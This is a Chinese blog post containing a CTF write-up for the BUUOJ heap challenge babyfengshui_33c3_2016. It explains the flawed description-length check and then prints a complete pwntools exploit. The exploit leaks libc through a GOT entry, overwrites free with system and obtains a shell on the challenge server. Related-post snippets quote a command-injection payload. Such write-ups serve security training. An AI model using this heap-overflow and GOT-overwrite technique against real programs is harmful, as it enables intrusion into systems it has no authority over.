buuoj刷题记录 - babyfengshui_33c3_2016

已于 2022-03-16 14:26:16 修改
阅读量139 收藏
点赞数
分类专栏: pwn入门 文章标签: 安全
于 2022-03-16 14:17:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34010404/article/details/123524761
版权

检查程序保护:在这里插入图片描述
拖进IDA看一下,add,show,edit,free
有一个全局的数组,每一个元素是一个地址,执行一个User结构体。
分析一下可以知道User结构体大概是这样子:

struct User
{
	char* szUserDescription;
	char szUserName[124];
}

add函数:
在这里插入图片描述
add函数调用了readDescription函数:
其中存在问题的就位于该函数内,该函数在Update内被会被调用.
在这里插入图片描述
add函数内需要注意的一个地方,就是readDescription执行的时候Used已经加1了,传进去的是比Used小1 的数,看一下汇编就知道了:
在这里插入图片描述
Used先加一,然后给readDescription传进去的是Used - 1.

然后看一下readDescription,
在这里插入图片描述
这里看不太明白的话看一下汇编代码:
在这里插入图片描述

重新输入了description的长度,但是长度的限制方法大概是是:
szDescription + lenght < User结构体地址.也就是 描述部分必须位于User之前,而且地址不能超过User(在内存里面)

构造方法:在这里插入图片描述

可以把0 和 2 free 掉,然后重写addUser,使这个User的结构体位于2 处,但是Description部分位于0处,这样就可以写一端很长的数据覆盖掉1,
之后可以搞free_got 为system 就可以getshell了.

操作过程中需要注意的地方:

  1. glibc2.23没有tcache,User结构体free的时候会被丢到unsorted bin里面.为了防止和top chunk合并,需要在2后面再add一个User
  2. unsorted bin 是FIFO,先得free 2,再free 0
  3. 0的描述大小和2的描述大小不能相同

exp:

from pwn import*

#sh = process('./pwn')
sh = remote('node4.buuoj.cn',28540)

def add(name,descriptionSize,payload):
    sh.sendlineafter(b'Action: ',b'0')
    sh.sendlineafter(b'size of description: ',str(descriptionSize).encode())
    sh.sendlineafter(b'name: ',name)    
    sh.sendlineafter(b'text length: ',str(len(payload)).encode())
    sh.sendlineafter(b'text',payload)

def display(idx):
    sh.sendlineafter(b'Action: ',b'2')
    sh.sendlineafter(b'index: ',str(idx).encode())
    sh.recvuntil(b'name: ')
    name = sh.recvline()[:-1]
    sh.recvuntil(b'description: ')
    description = sh.recvline()[:-1]
    return (name,description)


def UpdateDescription(idx,payload):
    sh.sendlineafter(b'Action: ',b'3')
    sh.sendlineafter(b'index: ',str(idx).encode())

    sh.sendlineafter(b'text length: ',str(len(payload)).encode())
    sh.sendlineafter(b'text: ',payload)

def DelUser(idx):
    sh.sendlineafter(b'Action: ',b'1')
    sh.sendlineafter(b'index: ',str(idx).encode())


payload = p64(0) 
payload += p32(0) + p32(0x89) + p32(0x804B010)

add(b'user1',8,b'a')            #0
add(b"/bin/sh\x00",16,b'b')     #1
add(b'user3',32,b'c')           #2

#防止合并,
add(b"merge",8,b'merge')        #3

DelUser(2)
DelUser(0)              

add(b"user3",8,b'emmm')         #4

#176 
payload = b'/bin/sh\x00' + b'\x00' * (8 + 128 + 8 + 16 + 8 ) + p32(0x0804B010) + b'HackedIt'

#gdb.attach(sh)
UpdateDescription(4,payload)
#
libc_base = u32(display(1)[1][0:4]) - 0x0070750

log.success('libc_base: %x\n',libc_base)

system = libc_base + 0x003a940

UpdateDescription(1,p32(system))
#
DelUser(4)

sh.interactive()

成功getshell
在这里插入图片描述

Suspend.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
robomongo-0.9.0-rc10-windows-x86_64
10-31
根据压缩包子文件的文件名称"robomongo-0.9.0-rc10-windows-x86_64-33c89ea.exe",我们可以推断这个文件是RoboMongo的安装程序,后缀".exe"表明它是Windows平台下的可执行文件,而"33c89ea"可能是这个特定构建的唯一...
BUU刷题记录(四)
山高路远
04-12 467
以下几题的ciscn是我先抽出来做的,因为不久就是ciscn,所以看看之前的题目,先不按顺序 十七、ciscn_2019_n_3 照例checksec一下 开启了nx和canary,relro只开启部分,可以修改got表(后面没用到就是了) 进入ida看看反汇编代码 总共有着四个功能,第一个new note: 在第一个功能里面,可以创建一个堆,堆里面第一个存放的是printf函数指针,第二存放了一个free函数指针,第三个存放有区别,当type==1,存放的是一个数据,type ==2,存放的是字符串
buuoj刷题笔记
q1415500189的博客
01-22 887
buuoj
BUUWeb刷题记录
最新发布
dangejinghong的博客
04-23 750
但是,如果要接着直接查这个flag就会出现问题了,select等关键词被过滤了,所以我们只能另辟蹊径,根据从网上大佬的wp学习,可以将。file=phar://压缩包/内部文件 phar://xxx.png/shell.php (zip要用#隔开,这个用/)file=php://filter/read=convert.base64-encode/resource=xxxx.php。发现他将空格过滤了,不过通过网上学习,发现可以用一些字符绕过空格,例如。
BUU刷题记录
as you know, nlp is fantasitc!
08-10 394
这个文章的知识点包括 sql注入中的异或盲注、preg_match的绕过(%0a绕过,prce限制)、basename去掉ascii码字符的情况。
BUUOJ-Web-刷题记录
x0r
09-01 346
为提升观感体验,本篇博文长期更新,新题目以二次编辑形式附在最后 [ACTF2020 新生赛]Exec 打开后发现网页是关于执行一个ping指令,经过测试是直接执行的,所以就直接命令执行了 127.0.0.1 | cat /flag 总结一下常见的Linux管道符 |按位或,直接执行|后面的语句 ||逻辑或,如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 &按位与,&a...
robomongo-0.9.0-darwin-x86_64-0786489.dmg。下载
01-05
官网下的太慢了,而且容易出错导致安装包打不开,好不容易下载下来完整能用的。
robomongo-0.9.0-rc8-windows-x86_64
05-18
2016年2月,Robomongo更新到了这个版本,它的重要特性之一就是对MongoDB 3.2版本的支持。MongoDB 3.2是MongoDB的一个重要里程碑,带来了许多性能提升和新功能,如聚合框架的增强、新的地理空间索引以及对JSON ...
robomongo-0.9.0-rc2 windows-x86_64 支持mongo3.x
01-29
robomongo-0.9.0-rc2 2016最新版
wd33c93.rar_Linux/Unix编程_Unix_Linux_
08-11
标题“wd33c93.rar_Linux/Unix编程_Unix_Linux_”暗示了这是一个与Linux或Unix系统相关的编程资源,可能是一个源代码库或者一个驱动程序的实现,其中“wd33c93”可能是设备驱动的名字,可能是针对某种特定硬件的,如...
buuojweb刷题wp详解及知识整理—-【护网杯】easy_tornado(模板注入+md5)
01-20
写在前面 服务端模板注入也是一种注入攻击(简称为SSTL) 这又涉及到了本人的知识盲区 借这个题学习补充一下知识 自己走过的路加wp辅助 信息收集加思路推理 点击一下/welcome.txt 回显 render 而且url处有异常 同理测试其他选项 通过猜测可知filehash的值就是/hint.txt中的算法得到的 从而 我们只要得到cookie_secret的值即可通过脚本的到于/fllllllllllllag对应的filename的值 模板注入拿到cookie_secret get传参 ?filename=/fllllllllllllag&filehash= 回显 发现可疑参数msg
BUU OJ 做题记录
weixin_30920597的博客
08-08 335
buu oj题库的题质量很高,这里记录一下 1.WarmUp 代码审计 查看源码发现提示source.php和hint.php source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$p...
buuoj刷题记录 - pwnable_hacknote
qq_34010404的博客
03-19 283
查看程序保护: 拖进IDA分析一下, Add函数正常,先创建八个字节的内存 struct Node{ { void* func_addr; void* content; } 然后根据输入的size开辟相应大小的内存 问题存在于DelNote函数中,free后没有置0 看一下PrintNote函数: 根据八个字节的前四个字节调用对应的函数,并把这个八个字节的首地址作为参数 若Note被free后,还是可以调用Print函数的,由于不确定func_addr是什么,所以会出现问题. 构造方法: 先Add两
buuoj刷题记录 - ciscn_2019_final_3
qq_34010404的博客
03-25 430
看了大佬们的思路才做出来的,这里只记录一下做题中踩的坑。 1.add函数 2.del函数 free后没有把数组元素标记为0,存在UAF漏洞. 思路是:1.double free 改fd 到 另一个chunk 的首地址处,然后修改chunksize ,原因是程序限制了分配大小为120字节,free到unsorted bin里面。 2.free chunk 到unsorted bin里面 3.double free 修改fd 到第二步中的chunk,之后便可以malloc 到unsorted bin处,然后
buuoj刷题记录 - npuctf_2020_easyheap
qq_34010404的博客
03-26 175
题目给了add,show,edit,del函数 问题在edit函数里面,重新编辑的时候可以溢出一个字节 看一下create函数,只能分配大小为 24,和56的空间 思路:覆盖下一个chunk的chunksize低字节达到修改chunk的大小,free 的时候会放到更大的tcache bin里面,之后malloc的时候会造成chunk重叠. 下面是我的构造方法: 把利用 0 把1中chunk2的size 改掉,改成0x40, (一会malloc的时候用到,注意只能分配大小为 56 和 24 的空间,(8.
buuoj刷题记录2
臭nana的博客
06-11 270
[GYCTF2020]Ezsqli 首先从题目名字就能知道这是道SQL注入题 打开题目测一下,输入1打印Nu1L,输入2打印V&N,其他的数字是报没有查询结果的错 加个单引号试试,显示bool(false) 布尔盲注 import requests url = "http://0a02ac5a-9801-4b63-a153-6d331955650d.node3.buuoj.cn/index.php" database = "" key='' for i in range(1
buuoj刷题记录 - [极客大挑战 2019]Not Bad
qq_34010404的博客
03-28 327
检查一下保护: 程序很简单,存在栈溢出漏洞,只能溢出16个字节。 只允许orw系统调用. 前八个字节用来jmp rsp ,紧接着加上5个字节近转移 call到buff的开始处执行. 这样就可以往buf里面写gadget来往指定地址处读入shellcode 之后跳转到shellcode把flag读出来 exp: from pwn import* #sh = process('./pwn') sh = remote('node4.buuoj.cn',29515) context.arch= 'x86_6
[buuctf]刷题记录web
qq_61109509的博客
05-12 616
文章目录pingpingping[极客大挑战]http pingpingping 打开后发现要传ip,想到ping命令,先尝试传入127.1.1.1 但是当我们打开flag.php时,发现 /?ip= fxck your space! 说明空格过滤。但是当我们绕过空格时,发现<,%09,$IFS都不起作用 原因是用 $IFS的话,会认为解析没结束,会把后面的也当做参数解析,而 $IFS$9的话,结束了 $IFS 后加上了一个不存在或者说空字符串的变量。所以解析为空,但结束了 $IFS正常执行后面
Buuoj刷题记录
meteox的博客
08-09 5480
--- title: Buuoj刷题记录 date: 2020-07-20 11:07:42 tags: 题解 categories: ctf img: https://img.buuoj.cn/buugirl/img/1.png 记录buuoj写过的题 web [HCTF 2018]WarmUp F12看到存在source.php,跳转后看到代码 <?php highlight_file(__FILE__); class emmm { publ
三菱电梯LEHY-III故障代码详解与维修指南
8. 32C-33C的故障代码涉及散热器温度过高、温度检测回路断线以及整流侧各相的综合故障,提示可能存在冷却系统故障或者整流模块的问题。 9. 336(SF_PLLHE1板锁相环故障)是关于电梯控制系统中锁相环的错误,这直接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Suspend.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值